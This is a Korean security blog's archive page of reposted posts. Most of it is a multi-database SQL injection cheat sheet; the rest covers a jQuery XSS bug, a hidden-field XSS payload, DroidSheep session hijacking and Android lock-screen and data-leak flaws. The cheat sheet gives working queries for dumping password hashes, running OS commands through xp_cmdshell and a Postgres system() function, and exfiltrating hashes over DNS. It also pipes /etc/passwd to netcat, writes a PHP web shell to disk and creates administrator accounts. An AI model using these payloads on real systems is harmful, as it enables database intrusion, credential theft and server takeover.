'위험한_친구들'에 해당되는 글 50건

  1. 2011.10.18 Cross-Site Scripting vulnerability with JavaScript and JQuery by bitfox
  2. 2011.10.13 SQL Injection Cheat Sheet by bitfox
  3. 2011.10.11 XSS: Cross-site Scripting by bitfox
  4. 2011.10.11 XSS in hidden field by bitfox
  5. 2011.10.05 Wireless Hacking & Wireless Security by bitfox
  6. 2011.10.03 Droidsheep-Android Application for Session Hijacking by bitfox
  7. 2011.10.03 AT&T Samsung Galaxy S II bypass security by bitfox
  8. 2011.10.03 HTC Android Vulnerability - Exposes Phone numbers, Gps, SMS, Emails etc by bitfox
  9. 2011.09.28 CRLF Injection by bitfox
  10. 2011.09.23 [동영상] 안드로이드 취약점 by bitfox

Cross-Site Scripting vulnerability with JavaScript and JQuery

Think you’ve protected your site against Cross-Site scripting attacks by escaping all the content that you’ve rendered? Thought about your javascript?

Here’s a neat bug that got us today. This example is contrived to show a point.

<!DOCTYPE html> 
  <meta charset="utf-8"> 
  <title>XSS Example</title> 
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script
    $(function() {  
      $('#users').each(function() {  
        var select = $(this);  
        var option = select.children('option').first();  
  <form method="post"> 
      <select id="users" name="users"> 
        <option value="bad">&lt;script&gt;alert(&#x27;xss&#x27;);&lt;/script&gt;</option> 
<!DOCTYPE html>
  <meta charset="utf-8">
  <title>XSS Example</title>
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js"></script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
  <form method="post">
      <select id="users" name="users">
        <option value="bad">&lt;script&gt;alert(&#x27;xss&#x27;);&lt;/script&gt;</option>

See the problem? Don’t worry, neither did the pair that worked on the javascript. But our QA showed us a neat little alert box!

It looks like the JQuery text() method returns the unescaped payload of the option, and the after() method then creates a nice little script tag. Nasty stuff.

How did we deal with the problem? This was our immediate fix:

// after() accepts a DOM element so lets create a text node  

Longer term fix – still open to suggestions.

[출처] watchitlater.com

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

XSS: Cross-site Scripting  (0) 2011.10.11
XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox

MSSQL Injection Cheat Sheet


SELECT @@version


SELECT 1 — comment
SELECT /*comment*/1

Current User

SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID

List Users

SELECT name FROM master..syslogins

List Password Hashes

SELECT name, password FROM master..sysxlogins — priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins — priv, mssql 2000.  Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins — priv, mssql 2005;
SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins — priv, mssql 2005

 Password Cracker

MSSQL 2000 and 2005 Hashes are both SHA1-based.  phrasen|drescher can crack these.

List Privileges


List DBA Accounts

SELECT is_srvrolemember(‘sysadmin’); — is your account a sysadmin?  returns 1 for true, 0 for false, NULL for invalid role.  Also try ‘bulkadmin’, ‘systemadmin’ and other values from the
SELECT is_srvrolemember(‘sysadmin’, ‘sa’); — is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username.

Current Database


List Databases

SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …

List Columns

SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = ‘mytable’); — for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

List Tables

SELECT name FROM master..sysobjects WHERE xtype = ‘U’; — use xtype = ‘V’ for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = ‘U’;
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name=’sometable’; — list colum names and types for master..sometable

Find Tables From Column Name

– NB: This example works only for the current database.  If you wan’t to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = ‘U’ AND syscolumns.name LIKE ‘%PASSWORD%’ — this lists table, column for each column containing the word ‘password’

Select Nth Row

SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC — gets 9th row

Select Nth Char

SELECT substring(‘abcd’, 3, 1) — returns c

Bitwise AND

SELECT 6 & 2 — returns 2
SELECT 6 & 1 — returns 0

ASCII Value -> Char

SELECT char(0×41) — returns A

Char -> ASCII Value

SELECT ascii(‘A’) – returns 65


SELECT CAST(’1′ as int);
SELECT CAST(1 as char)

String Concatenation

SELECT ‘A’ + ‘B’ – returns AB

If Statement

IF (1=1) SELECT 1 ELSE SELECT 2 — returns 1

Case Statement

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END — returns 1

Avoiding Quotes

SELECT char(65)+char(66) — returns AB

Time Delay

 WAITFOR DELAY ’0:0:5′ — pause for 5 seconds

Make DNS Requests

declare @host varchar(800); select @host = name FROM master..syslogins; exec(‘master..xp_getfiledetails ”\’ + @host + ‘c$boot.ini”’); — nonpriv, works on 2000

declare @host varchar(800); select @host = name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) + ‘.2.pentestmonkey.net’ from sys.sql_logins; exec(‘xp_fileexist ”\’ + @host + ‘c$boot.ini”’); — priv, works on 2005

– NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host.  Messy but necessary.
– Also check out theDNS tunnel feature of

Command Execution

EXEC xp_cmdshell ‘net user’; — priv

On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure ‘show advanced options’, 1; — priv
EXEC sp_configure ‘xp_cmdshell’, 1; — priv

Local File Access

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM ‘c:boot.ini’;
DROP TABLE mydata;

Hostname, IP Address


Create Users

EXEC sp_addlogin ‘user’, ‘pass’; — priv

Drop Users

EXEC sp_droplogin ‘user’; — priv

Make User DBA

EXEC master.dbo.sp_addsrvrolemember ‘user’, ‘sysadmin; — priv

Location of DB files


Default/System Databases



Oracle SQL Injection Cheat Sheet


SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$instance;


SELECT 1 FROM dual — comment
– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.

Current User

SELECT user FROM dual

List Users

SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv

List Password Hashes

SELECT name, password, astatus FROM sys.user$ — priv, <= 10g.  astatus tells you if acct is locked
SELECT name,spare4 FROM sys.user$ — priv, 11g

 Password Cracker

checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.

List Privileges

SELECT * FROM session_privs; — current privs
SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv

List DBA Accounts

SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles

Current Database

SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;

List Databases

SELECT DISTINCT owner FROM all_tables; — list schemas (one per user)
– Also query TNS listener for other databases.  See
tnscmd (services | status).

List Columns

SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’;
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’;

List Tables

SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;

Find Tables From Column Name

SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case

Select Nth Row

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)

Select Nth Char

SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’

Bitwise AND

SELECT bitand(6,2) FROM dual; — returns 2
SELECT bitand(6,1) FROM dual; — returns0

ASCII Value -> Char

SELECT chr(65) FROM dual; — returns A

Char -> ASCII Value

SELECT ascii(‘A’) FROM dual; — returns 65


SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;

String Concatenation

SELECT ‘A’ || ‘B’ FROM dual; — returns AB

If Statement

BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements

Case Statement

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

Avoiding Quotes

SELECT chr(65) || chr(66) FROM dual; — returns AB

Time Delay

BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_INADDR.get_host_name(’′) FROM dual; — if reverse looks are slow
SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow
– Also see
Heavy Queries to create a time delay

Make DNS Requests

SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual;
SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual;

Command Execution

Java can be used to execute commands if it’s installed.

ExtProc can sometimes be used too, though it normally failed for me.

Local File Access

UTL_FILE can sometimes be used.  Check that the following is non-null:
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’;

Java can be used to read and write files if it’s installed (it is not available in Oracle Express).

Hostname, IP Address

SELECT UTL_INADDR.get_host_name FROM dual;
SELECT host_name FROM v$instance;
SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address
SELECT UTL_INADDR.get_host_name(’′) FROM dual; — gets hostnames

Location of DB files


Default/System Databases



MySQL SQL Injection Cheat Sheet


SELECT @@version


SELECT 1; #comment
SELECT /*comment*/1;

Current User

SELECT user();
SELECT system_user();

List Users

SELECT user FROM mysql.user; — priv

List Password Hashes

SELECT host, user, password FROM mysql.user; — priv

Password Cracker

John the Ripper will crack MySQL password hashes.

List Privileges

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns

List DBA Accounts

SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;

SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv

Current Database

SELECT database()

List Databases

SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv

List Columns

SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

List Tables

SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’

Find Tables From Column Name

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’

Select Nth Row

SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

Select Nth Char

SELECT substr(‘abcd’, 3, 1); # returns c

Bitwise AND

SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

ASCII Value -> Char

SELECT char(65); # returns A

Char -> ASCII Value

SELECT ascii(‘A’); # returns 65


SELECT cast(’1′ AS unsigned integer);
SELECT cast(’123′ AS char);

String Concatenation

SELECT CONCAT(‘A’,'B’); #returns AB
SELECT CONCAT(‘A’,'B’,'C’); # returns ABC

If Statement

SELECT if(1=1,’foo’,'bar’); — returns ‘foo’

Case Statement

SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A

Avoiding Quotes

SELECT 0×414243; # returns ABC

Time Delay

SELECT SLEEP(5); # >= 5.0.12

Make DNS Requests


Command Execution

If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar).  The .so file should contain a User Defined Function (UDF).  raptor_udf.c explains exactly how you go about this.  Remember to compile for the target architecture which may or may not be the same as your attack platform.

Local File Access

…’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system

Hostname, IP Address


Create Users

CREATE USER test1 IDENTIFIED BY ‘pass1′; — priv

Delete Users

DROP USER test1; — priv

Make User DBA

GRANT ALL PRIVILEGES ON *.* TO test1@’%'; — priv

Location of DB files

SELECT @@datadir;

Default/System Databases

information_schema (>= mysql 5.0)


Postgres SQL Injection Cheat Sheet


SELECT version()


SELECT 1; –comment
SELECT /*comment*/1;

Current User

SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();

List Users

SELECT usename FROM pg_user

List Password Hashes

SELECT usename, passwd FROM pg_shadow — priv

Password Cracker

MDCrack can crack PostgreSQL’s MD5-based passwords.

List Privileges

SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user

List DBA Accounts

SELECT usename FROM pg_user WHERE usesuper IS TRUE

Current Database

SELECT current_database()

List Databases

SELECT datname FROM pg_database

List Columns

SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’)

List Tables

SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid)

Find Tables From Column Name

If you want to list all the table names that contain a column LIKE ‘%password%’:

SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’;

Select Nth Row

SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;

Select Nth Char

SELECT substr(‘abcd’, 3, 1); — returns c

Bitwise AND

SELECT 6 & 2; — returns 2
SELECT 6 & 1; –returns 0

ASCII Value -> Char

SELECT chr(65);

Char -> ASCII Value

SELECT ascii(‘A’);


SELECT CAST(1 as varchar);
SELECT CAST(’1′ as int);

String Concatenation

SELECT ‘A’ || ‘B’; — returnsAB

If Statement

IF statements only seem valid inside functions, so aren’t much use for SQL injection.  See CASE statement instead.

Case Statement

SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; — returns A

Avoiding Quotes

SELECT CHR(65)||CHR(66); — returns AB

Time Delay

SELECT pg_sleep(10); — postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS ‘/lib/libc.so.6′, ‘sleep’ language ‘C’ STRICT; SELECT sleep(10); –priv, create your own sleep function.  Taken from
here .

Make DNS Requests

Generally not possible in postgres.  However if contrib/dblink is installed (it isn’t by default) it can be used to resolve hostnames (assuming you have DBA rights):

SELECT * FROM dblink('host=put.your.hostname.here user=someuser  dbname=somedb', 'SELECT version()') RETURNS (result TEXT);

Alternatively, if you have DBA rights you could run an OS-level command (see below) to resolve hostnames, e.g. “ping pentestmonkey.net”.

Command Execution

CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — priv

SELECT system(‘cat /etc/passwd | nc 8080′); — priv, commands run as postgres/pgsql OS-level user

Local File Access

CREATE TABLE mydata(t text);
COPY mydata FROM ‘/etc/passwd’; — priv, can read files which are readable by postgres OS-level user
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; — get data back one row at a time
…’ UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; — get data back one row at a time …
DROP TABLE mytest mytest;

Write to a file:

CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES (‘<? pasthru($_GET[cmd]); ?>’);
COPY mytable (mycol) TO ‘/tmp/test.php’; –priv, write files as postgres OS-level user.  Generally you won’t be able to write to the web root, but it’s always work a try.
– priv user can also read/write files by
mapping libc functions

Hostname, IP Address

SELECT inet_server_addr(); — returns db server IP address (or null if using local connection)
SELECT inet_server_port(); — returns db server IP address (or null if using local connection)

Create Users

CREATE USER test1 PASSWORD ‘pass1′; — priv
CREATE USER test1 PASSWORD ‘pass1′ CREATEUSER; — priv, grant some privs at the same time

Drop Users

DROP USER test1; — priv

Make User DBA


 Location of DB files

SELECT current_setting(‘data_directory’); — priv
SELECT current_setting(‘hba_file’); — priv

Default/System Databases



DB2 SQL Injection Cheat Sheet


select versionnumber, version_timestamp from sysibm.sysversions;


select blah from foo; — comment like this

Current User

select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;

List Users

N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;

List Password Hashes

N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges

select * from syscat.tabauth; — privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;

List DBA Accounts


Current Database

select current server from sysibm.sysdummy1;

List Databases

SELECT schemaname FROM syscat.schemata;

List Columns

select name, tbname, coltype from sysibm.syscolumns;

List Tables

select name from sysibm.systables;

Find Tables From Column Name


Select Nth Row

select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char

SELECT SUBSTR(‘abc’,2,1) FROM sysibm.sysdummy1;  — returns b

Bitwise AND

This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value -> Char

select chr(65) from sysibm.sysdummy1; — returns ‘A’

Char -> ASCII Value

select ascii(‘A’) from sysibm.sysdummy1; — returns 65


SELECT cast(’123′ as integer) FROM sysibm.sysdummy1;
SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation

SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’
select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’

If Statement


Case Statement


Avoiding Quotes


Time Delay

???See Heavy Queries article for some ideas.

Make DNS Requests


Command Execution


Local File Access


Hostname, IP Address


Location of DB files


Default/System Databases




Informix SQL Injection Cheat Sheet


SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1;
SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit unix


select 1 FROM systables WHERE tabid = 1; — comment

Current User

SELECT USER FROM systables WHERE tabid = 1;
select CURRENT_ROLE FROM systables WHERE tabid = 1;

List Users

select username, usertype, password from sysusers;

List Password Hashes


List Privileges

select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; — which tables are accessible by which users
select procname, owner, grantor, grantee from sysprocauth join sysprocedures on sysprocauth.procid = sysprocedures.procid; — which procedures are accessible by which users

List DBA Accounts


Current Database

SELECT DBSERVERNAME FROM systables where tabid = 1; — server name

List Databases

select name, owner from sysdatabases;

List Columns

select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid;

List Tables

select tabname, owner FROM systables;
select tabname, viewtext FROM sysviews  join systables on systables.tabid = sysviews.tabid;

List Stored Procedures

select procname, owner FROM sysprocedures;

Find Tables From Column Name

select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like ‘%pass%’;

Select Nth Row

select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; — selects the 10th row

Select Nth Char

SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’

Bitwise AND

select bitand(6, 1) from systables where tabid = 1; — returns 0
select bitand(6, 2) from systables where tabid = 1; — returns 2

ASCII Value -> Char


Char -> ASCII Value

select ascii(‘A’) from systables where tabid = 1;


select cast(’123′ as integer) from systables where tabid = 1;
select cast(1 as char) from systables where tabid = 1;

String Concatenation

SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’
SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’

String Length

SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables;

If Statement


Case Statement

select tabid, case when tabid>10 then “High” else ‘Low’ end from systables;

Avoiding Quotes


Time Delay


Make DNS Requests


Command Execution


Local File Access


Hostname, IP Address

SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname

Location of DB files


Default/System Databases

These are the system databases:



Ingres SQL Injection Cheat Sheet


select dbmsinfo(‘_version’);


SELECT 123; — comment
select 123; /* comment */

Current User

select dbmsinfo(‘session_user’);
select dbmsinfo(‘system_user’);

List Users

First connect to iidbdb, then:
select name, password from iiuser;

Create Users

create user testuser with password = ‘testuser’;– priv

List Password Hashes

First connect to iidbdb, then:
select name, password from iiuser;

List Privileges

select dbmsinfo(‘db_admin’);
select dbmsinfo(‘create_table’);
select dbmsinfo(‘create_procedure’);
select dbmsinfo(‘security_priv’);
select dbmsinfo(‘select_syscat’);
select dbmsinfo(‘db_privileges’);
select dbmsinfo(‘current_priv_mask’);

List DBA Accounts


Current Database

select dbmsinfo(‘database’);

List Databases


List Columns

select column_name, column_datatype, table_name, table_owner from iicolumns;

List Tables

select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != ‘$ingres’;

Find Tables From Column Name


Select Nth Row

Astoundingly, this doesn’t seem to be possible!  This is as close as you can get:

select top 10 blah from table;
select first 10 blah form table;

Select Nth Char

select substr(‘abc’, 2, 1); — returns ‘b’

Bitwise AND

The function “bit_and” exists, but seems hard to use.  Here’s an
example of ANDing 3 and 5 together.  The result is a “byte” type
with value ?01:

select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);

ASCII Value -> Char


Char -> ASCII Value

(The “ascii” function exists, but doesn’t seem to do what I’d expect.)


select cast(123 as varchar);
select cast(’123′ as integer);

String Concatenation

select ‘abc’ || ‘def’;

If Statement


Case Statement


Avoiding Quotes


Time Delay


See Heavy Queries article for some ideas.

Make DNS Requests


Command Execution


Local File Access


Hostname, IP Address


Location of DB files


Default/System Databases


Installing Locally

The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be download from http://www.vmware.com/appliances/directory/832

Database Client

There is a client called “sql” which can be used for local connections (at least) in the  database server package above.

Logging in from command line

$ su -  ingres
$ sql iidbdb
* select dbmsinfo(‘_version’); go

Identifying on the network


출처] pentestmonkey.net


[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 뚱띵이_SQL' 카테고리의 다른 글

My-SQL을 이용한 Webshell 만들기  (0) 2012.02.28
Padding oracle attack explained  (0) 2011.10.19
Aqua Fold - Aqua Data Studio  (0) 2011.08.09
Posted by bitfox
[XSS: Cross-site Scripting]
여러 문서들이 많이 있지만 Persistent(stored)와 Non-Persistent 공격 패턴 및 개념을 인지하는데
명확히 도움을 줄 수 있는 문서이다.

[출처] www.itu.dk

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cross-Site Scripting vulnerability with JavaScript and JQuery  (0) 2011.10.18
XSS in hidden field  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox
type에 hidden 속성을 갖고 있으며 <, > 태그를 필터링하고 있을 경우.

<input type="hidden" onmouseover="javascript:alert(1)" style="display:block; width:500px; height:500px;" />

IE6, 7, 8 혹은 FireFox

Good Luck~ :-)

'위험한_친구들 > 십자군_XSS' 카테고리의 다른 글

Cross-Site Scripting vulnerability with JavaScript and JQuery  (0) 2011.10.18
XSS: Cross-site Scripting  (0) 2011.10.11
CRLF Injection  (0) 2011.09.28
Clickjacking for Shells  (0) 2011.09.22
XSS in Skype for iOS  (0) 2011.09.21
Posted by bitfox

새로운 공격패턴은 없고 기존의 패턴을 나름 잘 정리해 놓은 것 같다.

[출처] Exploit-DB

Posted by bitfox

Android is one of the best and most famous operating system for mobile devices, mobile devices is now a important part of our life and we are using it every where in any condition. There are a lot people that are using Wifi on their mobile devices. Look at the past when we had a Firefox ad ons that can hijack Facebook, Twitter and other social networking websites sessions and the tool is called Firesheep, after this we got FaceNiff the purpose is same means session hijacking while Faceniff is for android OS.

Now there is another best tool for Android OS that can hijack session and it called Droidsheep.
What Is DroidSheep ?
DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets sent via a wireless (802.11) network connection and extracts the session id from these packets in order to reuse them.
DroidSheep can capture sessions using the libpcap library and supports: OPEN Networks WEP encrypted networks WPA and WPA2 encrypted networks (PSK only). This software uses libpcap and arpspoof. DroidSheep has been developed with support of the information security team of the University of Trier.

You need an android-powered device, running at least version 2.1 of Android  You need Root-Access on your phone (link)  You need DroidSheep

[출처] thehackernews.com

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.
Posted by bitfox
삼성 갤2에 잠금 패스워드를 풀수 있는 보안 취약점이 발견되었습니다. 실험대상이 A&T의 삼성 갤럭시 2이라는데..파워버튼과 잠금버튼을 번갈어 가며 사용하면 해지가 된다는 군요 ^^;

내용은 아래와 같습니다.

BGR has uncovered a major security flaw on AT&T’s version of the Samsung Galaxy S II that renders Android’s security lock feature completely useless. Using a simple workaround, the security hole allows anyone to bypass the unlock pattern, which normally denies users access to an Android device unless a preset pattern is drawn on a grid of nine dots spread across the device’s lock screen. The same flaw allows users to bypass PIN security as well. We have confirmed that the flaw exists on AT&T’s Galaxy S II and not on Sprint’s Galaxy S II, Epic Touch 4G, though it is currently unclear if other phone models are affected. Hit the break for details on the flaw.

If you have a PIN or an unlock pattern set, all you have to do in order to bypass it is simply tap the lock button to wake the display and then let the screen time out and go black. Tap the lock button again and low and behold, the unlock screen is gone and the phone can be accessed with no PIN or pattern input whatsoever.

This security workaround exists as long as the phone has been successfully unlocked using the proper pattern or PIN at least one time, so the lock cannot be bypassed immediately after the device is powered on. Of course the first thing a user does after powering on a phone is unlock it, so lost and unattended devices are at risk unless they have been powered off since last being used. Of note, users with Microsoft Exchange security policies don’t seem to be affected.

A Samsung spokesperson responded to BGR’s inquiry, stating that the company is investigating the possible security threat but no further comment is available at this time. An AT&T spokesperson declined to comment.

Additional reporting by Todd Haselton. Updated to reflect that the flaw exists for PIN security as well.

UPDATE: Samsung issued the following statement in regards to the bug:

Samsung and AT&T are aware of the user interface issue on the Galaxy S II with AT&T. Currently, when using a security screen lock on the device, the default setting is for a screen timeout. If a user presses the power button on the device after the timeout period it will always require a password. If a user presses the power button on the phone before the timeout period, the device requests a password – but the password is not actually necessary to unlock it.

Samsung and AT&T are investigating a permanent solution. In the meantime, owners of the Galaxy S II can remedy the situation by re-setting their time-out screen to the “immediately” setting. This is done by going to the Settings ->Location and Security->Screen unlock settings->Timeout->Immediately.

[출처] BGR.com

Posted by bitfox

HTC Android Vulnerability - Exposes Phone numbers, Gps, SMS, Emails etc

If you are running a HTC Android smartphone with the latest updates applied, chances are your personal data is freely accessible to any app you have given network access to in the form of full Internet permissions.This vulnerability isn’t a backdoor or some inherent flaw in Android, it is instead HTC failing to lock down its data sharing policies used in the Tell HTC software users have to allow or disallow on their phone. The problem being, not only is your data vulnerable when Tell HTC is turned on, it’s just as vulnerable when it is turned off.

[자세히 보기]

[출처] thehackernews.com

Posted by bitfox
간만에 오래된 기억의 공격을 떠올렸다. --;
